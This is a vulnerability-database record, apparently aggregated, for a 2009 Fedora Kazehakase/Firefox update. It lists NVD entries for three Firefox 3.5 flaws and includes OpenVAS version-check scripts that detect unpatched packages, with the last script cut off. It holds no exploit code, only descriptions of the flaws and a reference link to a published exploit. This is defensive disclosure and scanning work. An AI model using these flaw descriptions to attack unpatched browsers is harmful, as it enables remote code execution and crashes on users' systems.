ID: FEDORA:9F0BA10F91F
Type: fedora
Reporter: Fedora
Modified: 2009-07-22T22:03:48
Description
Kazehakase is a Web browser which aims to provide a user interface that is truly user-friendly and fully customizable. This package uses Gecko as its HTML rendering engine.
{"cve": [{"lastseen": "2021-02-02T05:40:03", "description": "js/src/jstracer.cpp in the Just-in-time (JIT) JavaScript compiler (aka TraceMonkey) in Mozilla Firefox 3.5 before 3.5.1 allows remote attackers to execute arbitrary code via certain use of the escape function that triggers access to uninitialized memory locations, as originally demonstrated by a document containing P and FONT elements.", "edition": 4, "cvss3": {}, "published": "2009-07-15T15:30:00", "title": "CVE-2009-2477", "type": "cve", "cwe": ["CWE-94"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-2477"], "modified": "2017-09-19T01:29:00", "cpe": ["cpe:/a:mozilla:firefox:3.5"], "id": "CVE-2009-2477", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-2477", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:mozilla:firefox:3.5:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T05:40:03", "description": "Mozilla Firefox 3.0.x, 3.5, and 3.5.1 on Windows allows remote attackers to cause a denial of service (uncaught exception and application crash) via a long Unicode string argument to the write method. NOTE: this was originally reported as a stack-based buffer overflow. 
NOTE: on Linux and Mac OS X, a crash resulting from this long string reportedly occurs in an operating-system library, not in Firefox.\nReference links provided indicate Denial of Service impact only.", "edition": 4, "cvss3": {}, "published": "2009-07-16T15:30:00", "title": "CVE-2009-2479", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-2479"], "modified": "2018-10-10T19:40:00", "cpe": ["cpe:/a:mozilla:firefox:3.0.2", "cpe:/a:mozilla:firefox:3.0.12", "cpe:/a:mozilla:firefox:3.0.4", "cpe:/a:mozilla:firefox:3.0.14", "cpe:/a:mozilla:firefox:3.0.5", "cpe:/a:mozilla:firefox:3.5.1", "cpe:/a:mozilla:firefox:3.0.9", "cpe:/a:mozilla:firefox:3.5", "cpe:/a:mozilla:firefox:3.0.16", "cpe:/a:mozilla:firefox:3.0.13", "cpe:/a:mozilla:firefox:3.0.11", "cpe:/a:mozilla:firefox:3.0.3", "cpe:/a:mozilla:firefox:3.0.6", "cpe:/a:mozilla:firefox:3.0.15", "cpe:/a:mozilla:firefox:3.0.7", "cpe:/a:mozilla:firefox:3.0.10", "cpe:/a:mozilla:firefox:3.0.8", "cpe:/a:mozilla:firefox:3.0.1", "cpe:/a:mozilla:firefox:3.0.17"], "id": "CVE-2009-2479", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-2479", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}, "cpe23": ["cpe:2.3:a:mozilla:firefox:3.0.10:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:3.0.13:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:3.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:3.0.16:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:3.0.15:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:3.0.11:*:*:*:*:*:*:*", 
"cpe:2.3:a:mozilla:firefox:3.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:3.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:3.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:3.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:3.0.17:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:3.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:3.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:3.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:3.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:3.5:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:3.0.14:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:3.0.12:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:3.0.3:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T05:40:03", "description": "Mozilla Firefox 3.5 allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via unspecified vectors, related to a \"flash bug.\"", "edition": 4, "cvss3": {}, "published": "2009-07-16T15:30:00", "title": "CVE-2009-2478", "type": "cve", "cwe": ["CWE-189"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-2478"], "modified": "2009-08-07T05:22:00", "cpe": ["cpe:/a:mozilla:firefox:3.5"], "id": "CVE-2009-2478", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-2478", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:mozilla:firefox:3.5:*:*:*:*:*:*:*"]}], "openvas": [{"lastseen": "2017-07-25T10:56:05", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-2477", "CVE-2009-2478", "CVE-2009-2479"], "description": "The remote host is missing 
an update to firefox\nannounced via advisory FEDORA-2009-7898.", "modified": "2017-07-10T00:00:00", "published": "2009-07-29T00:00:00", "id": "OPENVAS:64465", "href": "http://plugins.openvas.org/nasl.php?oid=64465", "type": "openvas", "title": "Fedora Core 11 FEDORA-2009-7898 (firefox)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: fcore_2009_7898.nasl 6624 2017-07-10 06:11:55Z cfischer $\n# Description: Auto-generated from advisory FEDORA-2009-7898 (firefox)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Mozilla Firefox is an open-source web browser, designed for standards\ncompliance, performance and portability.\n\nUpdate Information:\n\nUpdate to new upstream Firefox version 3.5.1, fixing multiple security issues\ndetailed in the upstream advisories:\nhttp://www.mozilla.org/security/known-vulnerabilities/firefox35.html#firefox3.5.1\n\nUpdate also includes all packages depending on gecko-libs rebuilt against\nnew version of Firefox / XULRunner.\n\nChangeLog:\n\n* Fri Jul 17 2009 Martin Stransky - 3.5.1-1\n- Updated to 3.5.1.\n* Tue Jul 7 2009 Jan Horak - 3.5-2\n- Updated icon\";\ntag_solution = \"Apply the appropriate updates.\n\nThis update can be installed with the yum update program. 
Use \nsu -c 'yum update firefox' at the command line.\nFor more information, refer to Managing Software with yum,\navailable at http://docs.fedoraproject.org/yum/.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=FEDORA-2009-7898\";\ntag_summary = \"The remote host is missing an update to firefox\nannounced via advisory FEDORA-2009-7898.\";\n\n\n\nif(description)\n{\n script_id(64465);\n script_version(\"$Revision: 6624 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:11:55 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-07-29 19:28:37 +0200 (Wed, 29 Jul 2009)\");\n script_cve_id(\"CVE-2009-2477\", \"CVE-2009-2478\", \"CVE-2009-2479\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Fedora Core 11 FEDORA-2009-7898 (firefox)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=511228\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"firefox\", rpm:\"firefox~3.5.1~1.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"firefox-debuginfo\", rpm:\"firefox-debuginfo~3.5.1~1.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:37:24", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-2477", "CVE-2009-2478", "CVE-2009-2479"], "description": "The remote host is missing an update to firefox\nannounced via advisory FEDORA-2009-7898.", "modified": "2018-04-06T00:00:00", "published": "2009-07-29T00:00:00", "id": "OPENVAS:136141256231064465", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231064465", "type": "openvas", "title": "Fedora Core 11 FEDORA-2009-7898 (firefox)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: fcore_2009_7898.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory FEDORA-2009-7898 (firefox)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Mozilla Firefox is an open-source web browser, designed for standards\ncompliance, performance and portability.\n\nUpdate Information:\n\nUpdate to new upstream Firefox version 3.5.1, fixing multiple security issues\ndetailed in the upstream advisories:\nhttp://www.mozilla.org/security/known-vulnerabilities/firefox35.html#firefox3.5.1\n\nUpdate also includes all packages depending on gecko-libs rebuilt against\nnew version of Firefox / XULRunner.\n\nChangeLog:\n\n* Fri Jul 17 2009 Martin Stransky - 3.5.1-1\n- Updated to 3.5.1.\n* Tue Jul 7 2009 Jan Horak - 3.5-2\n- Updated icon\";\ntag_solution = \"Apply the appropriate updates.\n\nThis update can be installed with the yum update program. 
Use \nsu -c 'yum update firefox' at the command line.\nFor more information, refer to Managing Software with yum,\navailable at http://docs.fedoraproject.org/yum/.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=FEDORA-2009-7898\";\ntag_summary = \"The remote host is missing an update to firefox\nannounced via advisory FEDORA-2009-7898.\";\n\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.64465\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-07-29 19:28:37 +0200 (Wed, 29 Jul 2009)\");\n script_cve_id(\"CVE-2009-2477\", \"CVE-2009-2478\", \"CVE-2009-2479\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Fedora Core 11 FEDORA-2009-7898 (firefox)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=511228\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"firefox\", rpm:\"firefox~3.5.1~1.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"firefox-debuginfo\", rpm:\"firefox-debuginfo~3.5.1~1.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-04-29T22:26:37", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-2478", "CVE-2009-2479"], "description": "The host is installed with Mozilla Firefox browser and is prone\n to Buffer Overflow vulnerability.", "modified": "2020-04-27T00:00:00", "published": "2009-07-18T00:00:00", "id": "OPENVAS:1361412562310800846", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310800846", "type": "openvas", "title": "Mozilla Firefox Buffer Overflow Vulnerability - July09 (Windows)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mozilla Firefox Buffer Overflow Vulnerability - July09 (Windows)\n#\n# Authors:\n# Sharath S <sharaths@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2009 Greenbone Networks GmbH, 
http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.800846\");\n script_version(\"2020-04-27T09:00:11+0000\");\n script_tag(name:\"last_modification\", value:\"2020-04-27 09:00:11 +0000 (Mon, 27 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2009-07-18 09:37:41 +0200 (Sat, 18 Jul 2009)\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_cve_id(\"CVE-2009-2478\", \"CVE-2009-2479\");\n script_bugtraq_id(35707);\n script_name(\"Mozilla Firefox Buffer Overflow Vulnerability - July09 (Windows)\");\n script_xref(name:\"URL\", value:\"http://www.milw0rm.com/exploits/9158\");\n script_xref(name:\"URL\", value:\"http://xforce.iss.net/xforce/xfdb/51729\");\n script_xref(name:\"URL\", value:\"https://bugzilla.mozilla.org/show_bug.cgi?id=503286\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Buffer overflow\");\n script_dependencies(\"gb_firefox_detect_portable_win.nasl\");\n script_mandatory_keys(\"Firefox/Win/Ver\");\n script_tag(name:\"impact\", value:\"Successful attacks will let attackers to can cause Denial of Service to 
the\n legitimate user.\");\n script_tag(name:\"affected\", value:\"Firefox version 3.5.1 and prior on Windows\");\n script_tag(name:\"insight\", value:\"- A NULL pointer dereference error exists due an unspecified vectors, related\n to a 'flash bug.' which can cause application crash.\n\n - Stack-based buffer overflow error is caused by sending an overly long string\n argument to the 'document.write' method.\");\n script_tag(name:\"solution\", value:\"Upgrade to Firefox version 3.6.3 or later.\");\n script_tag(name:\"summary\", value:\"The host is installed with Mozilla Firefox browser and is prone\n to Buffer Overflow vulnerability.\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"http://www.mozilla.com/en-US/firefox/upgrade.html\");\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\n\nffVer = get_kb_item(\"Firefox/Win/Ver\");\nif(!ffVer){\n exit(0);\n}\n\nif(version_is_less_equal(version:ffVer, test_version:\"3.5.1\")){\n report = report_fixed_ver(installed_version:ffVer, vulnerable_range:\"Less than or equal to 3.5.1\");\n security_message(port: 0, data: report);\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2017-07-02T21:13:59", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-2478", "CVE-2009-2479"], "description": "The host is installed with Mozilla Firefox browser and is prone\n to Buffer Overflow vulnerability.", "modified": "2016-12-28T00:00:00", "published": "2009-07-18T00:00:00", "id": "OPENVAS:800847", "href": "http://plugins.openvas.org/nasl.php?oid=800847", "type": "openvas", "title": "Mozilla Firefox Buffer Overflow Vulnerability - July09 (Linux)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_firefox_bof_vuln_jul09_lin.nasl 4865 2016-12-28 16:16:43Z teissa $\n#\n# Mozilla Firefox Buffer Overflow Vulnerability - July09 
(Linux)\n#\n# Authors:\n# Sharath S <sharaths@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful attacks will let attackers to can cause Denial of Service to the\n legitimate user.\n Impact Level: Application\";\ntag_affected = \"Firefox version 3.5.1 and prior on Linux\";\ntag_insight = \"- A NULL pointer dereference error exists due an unspecified vectors, related\n to a 'flash bug.' 
which can cause application crash.\n - Stack-based buffer overflow error is caused by sending an overly long string\n argument to the 'document.write' method.\";\ntag_solution = \"Upgrade to Firefox version 3.6.3 or later,\n For updates refer to http://www.mozilla.com/en-US/firefox/upgrade.html\";\ntag_summary = \"The host is installed with Mozilla Firefox browser and is prone\n to Buffer Overflow vulnerability.\";\n\nif(description)\n{\n script_id(800847);\n script_version(\"$Revision: 4865 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2016-12-28 17:16:43 +0100 (Wed, 28 Dec 2016) $\");\n script_tag(name:\"creation_date\", value:\"2009-07-18 09:37:41 +0200 (Sat, 18 Jul 2009)\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_cve_id(\"CVE-2009-2478\", \"CVE-2009-2479\");\n script_bugtraq_id(35707);\n script_name(\"Mozilla Firefox Buffer Overflow Vulnerability - July09 (Linux)\");\n script_xref(name : \"URL\" , value : \"http://www.milw0rm.com/exploits/9158\");\n script_xref(name : \"URL\" , value : \"http://xforce.iss.net/xforce/xfdb/51729\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.mozilla.org/show_bug.cgi?id=503286\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Buffer overflow\");\n script_dependencies(\"gb_firefox_detect_lin.nasl\");\n script_require_keys(\"Firefox/Linux/Ver\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\n\nffVer = 
get_kb_item(\"Firefox/Linux/Ver\");\nif(!ffVer){\n exit(0);\n}\n\n# Grep for Firefox version <= 3.5.1\nif(version_is_less_equal(version:ffVer, test_version:\"3.5.1\")){\n security_message(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2017-07-02T21:13:48", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-2478", "CVE-2009-2479"], "description": "The host is installed with Mozilla Firefox browser and is prone\n to Buffer Overflow vulnerability.", "modified": "2016-12-28T00:00:00", "published": "2009-07-18T00:00:00", "id": "OPENVAS:800846", "href": "http://plugins.openvas.org/nasl.php?oid=800846", "type": "openvas", "title": "Mozilla Firefox Buffer Overflow Vulnerability - July09 (Windows)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_firefox_bof_vuln_jul09_win.nasl 4865 2016-12-28 16:16:43Z teissa $\n#\n# Mozilla Firefox Buffer Overflow Vulnerability - July09 (Windows)\n#\n# Authors:\n# Sharath S <sharaths@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful attacks will let attackers to can cause Denial of Service to the\n legitimate user.\n Impact Level: Application\";\ntag_affected = \"Firefox version 3.5.1 and prior on Windows\";\ntag_insight = \"- A NULL pointer dereference error exists due an unspecified vectors, related\n to a 'flash bug.' which can cause application crash.\n - Stack-based buffer overflow error is caused by sending an overly long string\n argument to the 'document.write' method.\";\ntag_solution = \"Upgrade to Firefox version 3.6.3 or later,\n For updates refer to http://www.mozilla.com/en-US/firefox/upgrade.html\";\ntag_summary = \"The host is installed with Mozilla Firefox browser and is prone\n to Buffer Overflow vulnerability.\";\n\nif(description)\n{\n script_id(800846);\n script_version(\"$Revision: 4865 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2016-12-28 17:16:43 +0100 (Wed, 28 Dec 2016) $\");\n script_tag(name:\"creation_date\", value:\"2009-07-18 09:37:41 +0200 (Sat, 18 Jul 2009)\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_cve_id(\"CVE-2009-2478\", \"CVE-2009-2479\");\n script_bugtraq_id(35707);\n script_name(\"Mozilla Firefox Buffer Overflow Vulnerability - July09 (Windows)\");\n script_xref(name : \"URL\" , value : \"http://www.milw0rm.com/exploits/9158\");\n script_xref(name : \"URL\" , value : \"http://xforce.iss.net/xforce/xfdb/51729\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.mozilla.org/show_bug.cgi?id=503286\");\n\n script_category(ACT_GATHER_INFO);\n 
script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Buffer overflow\");\n script_dependencies(\"gb_firefox_detect_win.nasl\");\n script_require_keys(\"Firefox/Win/Ver\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\n\nffVer = get_kb_item(\"Firefox/Win/Ver\");\nif(!ffVer){\n exit(0);\n}\n\n# Grep for Firefox version <= 3.5.1\nif(version_is_less_equal(version:ffVer, test_version:\"3.5.1\")){\n security_message(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2020-04-29T22:26:31", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-2478", "CVE-2009-2479"], "description": "The host is installed with Mozilla Firefox browser and is prone\n to Buffer Overflow vulnerability.", "modified": "2020-04-27T00:00:00", "published": "2009-07-18T00:00:00", "id": "OPENVAS:1361412562310800847", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310800847", "type": "openvas", "title": "Mozilla Firefox Buffer Overflow Vulnerability - July09 (Linux)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mozilla Firefox Buffer Overflow Vulnerability - July09 (Linux)\n#\n# Authors:\n# Sharath S <sharaths@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software 
Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.800847\");\n script_version(\"2020-04-27T09:00:11+0000\");\n script_tag(name:\"last_modification\", value:\"2020-04-27 09:00:11 +0000 (Mon, 27 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2009-07-18 09:37:41 +0200 (Sat, 18 Jul 2009)\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_cve_id(\"CVE-2009-2478\", \"CVE-2009-2479\");\n script_bugtraq_id(35707);\n script_name(\"Mozilla Firefox Buffer Overflow Vulnerability - July09 (Linux)\");\n script_xref(name:\"URL\", value:\"http://www.milw0rm.com/exploits/9158\");\n script_xref(name:\"URL\", value:\"http://xforce.iss.net/xforce/xfdb/51729\");\n script_xref(name:\"URL\", value:\"https://bugzilla.mozilla.org/show_bug.cgi?id=503286\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Buffer overflow\");\n script_dependencies(\"gb_firefox_detect_lin.nasl\");\n script_mandatory_keys(\"Firefox/Linux/Ver\");\n script_tag(name:\"impact\", 